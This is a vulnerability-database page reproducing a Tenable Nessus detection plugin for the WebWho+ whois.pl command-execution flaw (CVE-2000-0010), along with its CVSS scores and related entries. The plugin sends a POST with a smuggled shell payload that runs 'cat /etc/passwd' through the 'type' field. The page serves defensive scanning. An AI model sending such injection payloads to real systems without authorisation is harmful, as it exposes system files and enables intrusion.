Lucene search
This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.WEBWHO_PL.NASLHistoryMar 09, 2003 - 12:00 a.m.
WebWho+ whois.pl time Parameter Arbitrary Command Execution
2003-03-0900:00:00
This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
23
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.06
Percentile
93.5%
The WebWho+ CGI script appears to be installed on the remote host. This Perl script allows an attacker to view any file on the remote host as well as to execute arbitrary commands, both subject to the privileges of the web server user id.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(11333);
script_version("1.21");
script_cve_id("CVE-2000-0010");
script_bugtraq_id(892);
script_name(english:"WebWho+ whois.pl time Parameter Arbitrary Command Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that is prone to arbitrary
code execution." );
script_set_attribute(attribute:"description", value:
"The WebWho+ CGI script appears to be installed on the remote host.
This Perl script allows an attacker to view any file on the remote host
as well as to execute arbitrary commands, both subject to the privileges
of the web server user id." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Dec/322");
script_set_attribute(attribute:"solution", value:
"Remove the affected script." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/03/09");
script_set_attribute(attribute:"vuln_publication_date", value: "1999/12/26");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english: "Checks if webwho.pl is vulnerable");
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2003-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english: "CGI abuses");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
cmd = 'command=X&type="echo foo;cat /etc/passwd;echo foo&Check=X';
foreach dir (cgi_dirs())
{
if ( is_cgi_installed3(item:dir + "/webwho.pl", port:port) )
{
r = http_send_recv3(method: 'POST', item:string(dir, "/webwho.pl"), port:port, data: cmd);
if (isnull(r)) exit(0);
if(egrep(pattern:".*root:.*:0:[01]:.*", string: r[2]))
{
r[2] = data_protection::redact_etc_passwd(output:r[2]);
if (report_verbosity > 0)
security_hole(port: port, extra: r[2]);
else
security_hole(port:port);
exit(0);
}
}
}
Related
cvelist
cvelist
CVE-2000-0010
2000-04-25 04:00:00
exploitdb
exploitdb
Tony Greenwood WebWho+ 1.1 - Remote Command Execution
1999-12-26 00:00:00
nvd
nvd
CVE-2000-0010
1999-12-26 05:00:00
cve
cve
CVE-2000-0010
2000-04-25 04:00:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.06
Percentile
93.5%
Related for WEBWHO_PL.NASL